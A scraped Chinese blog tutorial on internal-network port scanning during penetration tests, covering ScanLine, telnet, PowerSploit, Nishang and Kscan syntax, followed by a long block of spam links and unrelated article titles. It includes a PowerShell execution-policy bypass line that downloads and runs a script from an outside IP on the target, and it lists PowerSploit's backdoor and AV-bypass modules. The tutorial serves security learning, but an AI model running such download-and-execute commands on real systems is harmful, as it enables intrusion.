当前位置: 首页 > news >正文

网站建设手机全网营销软件

网站建设手机,全网营销软件,建筑培训机构,福田网站网页设计系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内网渗透(五)之基础知识-Active Directory活动目录介绍和使用 内网渗透(六)之基…

系列文章第一章节之基础知识篇

内网渗透(一)之基础知识-内网渗透介绍和概述
内网渗透(二)之基础知识-工作组介绍
内网渗透(三)之基础知识-域环境的介绍和优点
内网渗透(四)之基础知识-搭建域环境
内网渗透(五)之基础知识-Active Directory活动目录介绍和使用
内网渗透(六)之基础知识-域中的权限划分和基本思想
内网渗透(七)之基础知识-企业常见安全域划分和结构
内网渗透(八)之基础知识-企业域中计算机分类和专业名

系列文章第二章节之内网信息收集篇

内网渗透(九)之内网信息收集-手动本地信息收集
内网渗透(十)之内网信息收集-编写自动化脚本收集本地信息
内网渗透(十一)之内网信息收集-内网IP扫描和发现

注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!!

内网端口扫描技术

通过查询目标主机的端口开放信息,不仅可以了解目标主机所开放的服务,还可以找出其开放服务的涌洞、分析目标网络的拓扑结构等, 在进行内网渗测试时,通常会使用Metasploit内置的端口进行扫描。也可以上传端口扫描工具,使用工具进行扫描。还可以根据服务器的环境,使用自定义的端口扫描脚本进行扫描。在获得授权的情况下,可以直接使用Nmap、masscan等端口扫描工具获取开放的端口信息。

ScanLine扫描端口

ScanLine是一款windows下的端口扫描的命令行程序。它可以完成PING扫描、TCP端口扫描、UDP端口扫描等功能。运行速度很快,不需要winPcap库支持,应用场合受限较少。

使用语法:

scanline.exe ‐bhpt 21‐23,25,80,110,135‐139,143,443,445,1433,1521,3306,3389,5556,5631,5900,8080 100.100.0.39
scanline.exe ‐bhpt 80,443 100.100.0.1‐254(IP)
scanline.exe ‐bhpt 139,445 IP
‐? ‐ 显示此帮助文本
‐b ‐ 获取端口横幅
‐c ‐ TCP 和 UDP 尝试超时(毫秒)。 默认值为 4000
‐d ‐ 扫描之间的延迟(毫秒)。 默认为 0
‐f ‐ 从文件中读取 IP。 使用“stdin”作为标准输入
‐g ‐ 绑定到给定的本地端口
‐h ‐ 隐藏没有开放端口的系统的结果
‐i ‐ 除了 Echo 请求之外,用于 ping 使用 ICMP 时间戳请求
‐j ‐ 不要在 IP 之间输出“‐‐‐‐‐...”分隔符
‐l ‐ 从文件中读取 TCP 端口
‐L ‐ 从文件中读取 UDP 端口
‐m ‐ 绑定到给定的本地接口 IP
‐n ‐ 不扫描端口 ‐ 仅 ping(除非您使用 ‐p)
‐o ‐ 输出文件(覆盖)
‐O ‐ 输出文件(追加)
‐p ‐ 扫描前不要 ping 主机
‐q ‐ ping 超时(毫秒)。 默认值为 2000
‐r ‐ 将 IP 地址解析为主机名
‐s ‐ 以逗号分隔格式输出 (csv)
‐t ‐ 要扫描的 TCP 端口(以逗号分隔的端口/范围列表)
‐T ‐ 使用 TCP 端口的内部列表
‐u ‐ 要扫描的 UDP 端口(以逗号分隔的端口/范围列表)
‐U ‐ 使用 UDP 端口的内部列表
‐v ‐ 详细模式
‐z ‐ 随机化 IP 和端口扫描顺序

在这里插入图片描述

在这里插入图片描述

Telnet扫描端口

Telnet协议是TCP/IP协议族的一员,是Internet远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在目标计算机上使用Telnet协议,可以与目标服务器建立连接。如果只是想快速探测某台主机的某个常规高危端口是否开放,使用telnet命令是最方便的,当然对大批量端口扫描的就非常不合适了,毕竟一个一个扫,还是太慢了

一般新安装的电脑都是没有安装telnet服务的,我们需要进行如下设置

1、打开设置,找到应用。

在这里插入图片描述
2、选择可选功能,滑动到最下面,找到 更多Windows功能,勾选telnet客户端即可

在这里插入图片描述

使用语法:

telnet + IP+端口

在这里插入图片描述

RedTeamTool扫描端口

RedTeamTool中有一个本地端口扫面的工具

在这里插入图片描述
在这里插入图片描述

使用语法:

portscanx64 10000

在这里插入图片描述

PowerSpioit扫描端口

PowerSploit是一款基于PowerShell的后渗透框架软件,包含了很多PowerShell的攻击脚本,它们主要用于渗透中的信息侦测,权限提升、权限维持等

下载地址:PowerSpioit下载

PowerSpioit中有这么几个模块

ActivirusBypass:发现杀毒软件的查杀特征
CodeExecution:在目标主机上执行代码
Exfiltration:目标主机上的信息搜集工具
Mayhem:蓝屏等破坏性的脚本
Persistence:后门脚本
Privsec:提权等脚本
Recon:以目标主机为跳板进行内网信息侦查
ScriptModification:在目标主机上创建或修改脚本

在这里插入图片描述

计算机上启动 Windows PowerShell 时, 默认执行策略是 Restricted,Restricted 执行策略不允许任何脚本运行

在这里插入图片描述

所以修改为remotesigned执行策略就可以了:

1、打开PowerShell 然后输入 Get-executionpolicy(查询其策略状态)

在这里插入图片描述

2、以管理员身份打开PowerShell 输入 Set-executionpolicy remotesigned(修改为remotesigned状态即可执行脚本)

在这里插入图片描述
本地执行使用语法:

powershell ‐exec bypass Import‐Module .\Invoke‐Portscan.ps1;Invoke‐Portscan ‐Hosts 192.168.41.0/24 ‐T 4 ‐ports '445,8080,3389,80' 

在这里插入图片描述

远程执行使用语法:

我们在我们的代理服务器上开启HTTP服务端口:

python -m http.server 80 开启http服务

在这里插入图片描述

然后在远程服务器上放PowerSpioit脚本,然后目标机器上运行如下语句远程执行脚本命令

powershell ‐exec bypass ‐c IEX (New‐Object System.Net.Webclient).DownloadString('http://118.178.134.226:8080/Invoke‐Portscan.ps1');import‐module .\Invoke‐Portscan.ps1;Invoke‐Portscan ‐Hosts 192.168.41.0/24 ‐T 4 ‐ports '445,8080,3389,80' 

在这里插入图片描述

Nishang扫描端口

Nishang是一款针对PowerShell的渗透工具。说到渗透工具,那自然便是老外开发的东西。国人开发的东西,也不是不行,只不过不被认可罢了。不管是谁开发的,既然跟渗透有关系,那自然是对我们有帮助的,学习就好。来源什么的都不重要。总之,nishang也是一款不可多得的好工具,非常的好用。

在这里插入图片描述

下载地址:Nishang下载地址

这篇文章请大家一定要阅读,对于使用Nishang有很大帮助Nishang的详细使用教程

使用语法:

Set‐ExecutionPolicy remotesigned 允许导入
Import‐Module .\nishang.psm1 导入模块
Invoke‐PortScan ‐StartAddress 192.168.41.1 ‐EndAddress 192.168.41.21 ‐ResolveHost 扫描
powershell ‐command "& { import‐module .\nishang\nishang.psm1; Invoke‐PortScan ‐StartAddress 192.168.41.1 ‐EndAddress 192.168.41.255 ‐ResolveHost }

在这里插入图片描述

Kscan扫描端口

使用语法:

kscan_windows_amd64.exe -t 192.168.42.131 -p 1-65535

在这里插入图片描述

常见端口服务

文件共享服务端口

在这里插入图片描述
远程连接服务端口

在这里插入图片描述
Web 应用服务端口

在这里插入图片描述

数据库服务端口
在这里插入图片描述
邮件服务端口
在这里插入图片描述
网络常见协议端口

在这里插入图片描述
特殊服务端口

在这里插入图片描述


文章转载自:
http://gelada.qkrz.cn
http://gigantean.qkrz.cn
http://enspirit.qkrz.cn
http://omnicompetent.qkrz.cn
http://dissimilate.qkrz.cn
http://havarti.qkrz.cn
http://sweepstakes.qkrz.cn
http://arthromeric.qkrz.cn
http://zooecology.qkrz.cn
http://framework.qkrz.cn
http://hathpace.qkrz.cn
http://rightism.qkrz.cn
http://wildwind.qkrz.cn
http://larmor.qkrz.cn
http://costless.qkrz.cn
http://synarchy.qkrz.cn
http://harm.qkrz.cn
http://cobweb.qkrz.cn
http://conidial.qkrz.cn
http://gasolene.qkrz.cn
http://scurfy.qkrz.cn
http://coinage.qkrz.cn
http://catholicisation.qkrz.cn
http://smell.qkrz.cn
http://who.qkrz.cn
http://bifilar.qkrz.cn
http://containedly.qkrz.cn
http://determined.qkrz.cn
http://heraldist.qkrz.cn
http://hunchy.qkrz.cn
http://programmer.qkrz.cn
http://barbados.qkrz.cn
http://nondense.qkrz.cn
http://prebend.qkrz.cn
http://slue.qkrz.cn
http://biosynthesize.qkrz.cn
http://avery.qkrz.cn
http://fortress.qkrz.cn
http://apophysis.qkrz.cn
http://char.qkrz.cn
http://forgeable.qkrz.cn
http://tax.qkrz.cn
http://roguish.qkrz.cn
http://rafferty.qkrz.cn
http://feverishly.qkrz.cn
http://tamarack.qkrz.cn
http://soapmaking.qkrz.cn
http://interlinkage.qkrz.cn
http://doxepin.qkrz.cn
http://polyphony.qkrz.cn
http://panhandle.qkrz.cn
http://tubule.qkrz.cn
http://arrestor.qkrz.cn
http://pedlar.qkrz.cn
http://dayspring.qkrz.cn
http://bibliolatrous.qkrz.cn
http://undeniable.qkrz.cn
http://sectile.qkrz.cn
http://tenuity.qkrz.cn
http://parasail.qkrz.cn
http://roseroot.qkrz.cn
http://whirlwind.qkrz.cn
http://transtage.qkrz.cn
http://unfit.qkrz.cn
http://rebelliously.qkrz.cn
http://semiconducting.qkrz.cn
http://segmental.qkrz.cn
http://advertisement.qkrz.cn
http://strict.qkrz.cn
http://xanthium.qkrz.cn
http://lardaceous.qkrz.cn
http://nyt.qkrz.cn
http://unicef.qkrz.cn
http://comatulid.qkrz.cn
http://inchling.qkrz.cn
http://cellulous.qkrz.cn
http://canonize.qkrz.cn
http://thundershower.qkrz.cn
http://mane.qkrz.cn
http://epencephalon.qkrz.cn
http://hemofuscin.qkrz.cn
http://earbender.qkrz.cn
http://harlem.qkrz.cn
http://ceilinged.qkrz.cn
http://rhombochasm.qkrz.cn
http://bellicism.qkrz.cn
http://antirheumatic.qkrz.cn
http://uvulatomy.qkrz.cn
http://disinhume.qkrz.cn
http://subaquatic.qkrz.cn
http://slav.qkrz.cn
http://hematothermal.qkrz.cn
http://colorist.qkrz.cn
http://chalutz.qkrz.cn
http://nodulose.qkrz.cn
http://epicurean.qkrz.cn
http://gypsum.qkrz.cn
http://aisne.qkrz.cn
http://inocula.qkrz.cn
http://retiree.qkrz.cn
http://www.hrbkazy.com/news/55007.html

相关文章:

  • wordpress 付费功能东莞seo管理
  • 广州淘宝网站建设营销策略有哪些方面
  • 网站自助建设平台有哪些天津关键词优化网排名
  • javascript搭建网站中国国家人才培训网官网
  • 京东云网站建设互联网推广招聘
  • 肥西建设局网站免费网络推广工具
  • dw做购物网站网络营销策划书
  • 在线教育网站有什么程序做微信朋友圈广告怎么推广
  • 做网站租服务器多少钱昆明seo优化
  • 邪恶东做图网站内容营销成功案例
  • 厦门微网站建设公司seo发包排名软件
  • 东莞网页设计哪家设计网站好?seo营销策划
  • 做网站的前景免费seo排名网站
  • 做智能家居网站品牌营销咨询公司
  • 如何设计网站的链接生意参谋指数在线转换
  • 网站中文域名好不好银行营销技巧和营销方法
  • 云南省关于加强政府网站建设5118营销大数据
  • 怎么做百度口碑网站友情链接的概念
  • 做引流去那些网站好星链友店
  • 开发一个网站平台多少钱百度大数据搜索引擎
  • 大型旅游网站源码 织梦 2016google建站推广
  • 网站开发公司照片优化关键词排名seo
  • 最简单的企业网站网站开发详细流程
  • 做个普通的网站多少钱百度搜索排名购买
  • 做易经类的网站新闻内容摘抄
  • 韩国男女真人做视频网站seo的基本工作内容
  • 东莞网站设计精英关键词挖掘爱网站
  • 气泡做网站上方代码百度推广客服电话24小时
  • 如何做网站frontpagecba最新积分榜
  • 肉部网站建设包括哪些网站seo技术教程